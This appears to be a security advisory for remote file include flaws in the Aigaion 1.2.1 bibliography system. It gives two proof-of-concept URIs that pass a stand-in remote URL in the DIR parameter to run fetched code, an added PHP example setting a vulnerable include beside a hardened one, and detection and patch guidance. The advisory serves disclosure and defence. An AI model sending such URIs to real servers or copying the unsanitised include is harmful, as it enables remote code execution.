Aigaion Multiple Remote File Include Vulnerabilities
BID:21038
Info
| Bugtraq ID: | 21038 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 13 2006 12:00AM |
| Updated: | Jan 25 2007 04:13PM |
| Credit: | navairum is credited with the discovery of these vulnerabilities. |
| Vulnerable: | Aigaion Web based bibliography management system 1.2.1 |
| Not Vulnerable: | Aigaion Web based bibliography management system 1.3 |
Discussion
Aigaion is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Version 1.2.1 is vulnerable to these issues; other versions may also be affected.
Exploit / POC
An attacker may exploit these issues using a web client.
The following proof-of-concept URIs are available:
http://www.example.com/[PATH]/_basicfunctions.php?DIR=http://www.example2.com/uhoh.txt?
http://www.example.com/path/pageactionauthor.php?DIR=http://www.example2.com/uhoh.txt?
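The proof-of-concept URIs above show the shape of the flaw: a request parameter named DIR ends up in a PHP include path, and with URL wrappers enabled the server fetches and executes whatever the URL points at. The PHP below is an added illustration written for this page, not Aigaion's source (which the advisory does not reproduce); the include statement, the function names and the file names in the allow-list are assumptions. It places the assumed vulnerable pattern beside a hardened version that keeps request data out of include paths entirely.

```php
<?php
// Added illustrative example, not Aigaion's code. It models the class of
// remote file include described in the advisory: a request parameter named
// DIR is used as the base of an include() path. All function and file names
// here are assumed for illustration.

// --- Vulnerable pattern (assumed; the advisory does not show the source) ---
function vulnerable_include(): void
{
    // $_GET['DIR'] is used unchecked as an include path. When PHP's URL
    // wrappers are enabled for include, a value such as
    // "http://www.example2.com/uhoh.txt?" makes the server fetch and run the
    // remote file; the trailing "?" turns the rest of the path into a query
    // string of that URL, so the appended filename no longer matters.
    $dir = $_GET['DIR'];
    include $dir . '/lib/functions.php';
}

// --- Hardened pattern ---
// 1. Never derive an include path from request data. Fix the base directory
//    in code, relative to the script itself.
define('APP_BASE', realpath(__DIR__));

// 2. If a request parameter really must select a file, map it through an
//    allow-list of known names and never use its value as a path fragment.
const PAGE_MODULES = [
    'author' => 'pageactionauthor.php',   // assumed module names
    'basic'  => '_basicfunctions.php',
];

function resolve_module(string $requested): ?string
{
    if (!array_key_exists($requested, PAGE_MODULES)) {
        return null;                       // unknown name: refuse, do not guess
    }
    $path = realpath(APP_BASE . '/' . PAGE_MODULES[$requested]);
    // 3. Defence in depth: realpath() returns false for a missing file and
    //    collapses any "../" segments, so the result must still sit inside
    //    APP_BASE before it is included.
    if ($path === false || strpos($path, APP_BASE . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function hardened_include(): void
{
    $module = resolve_module($_GET['module'] ?? '');
    if ($module === null) {
        http_response_code(400);
        exit('unknown module');
    }
    include $module;
}

// 4. Server-side setting that removes the remote-include primitive regardless
//    of application code (php.ini); allow_url_include exists since PHP 5.2
//    and is Off by default, allow_url_fopen can be disabled when the
//    application does not need URL wrappers at all:
//      allow_url_include = Off
//      allow_url_fopen   = Off
```

For detection, a web-server access log entry whose query string carries a parameter value beginning with `http://`, `https://`, `ftp://` or `php://` into a `.php` script is the signature of this attack class; the hardened code above also makes every such request fail closed with a 400 rather than an include error, which is itself a useful log signal.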
Solution / Fix
Solution:
The vendor has released version 1.3 to address these issues; please see the reference section for details.
Aigaion Web based bibliography management system 1.2.1
Aigaion aigaion_1.3.zip
http://downloads.sourceforge.net/aigaion/aigaion_1.3.zip
References
References: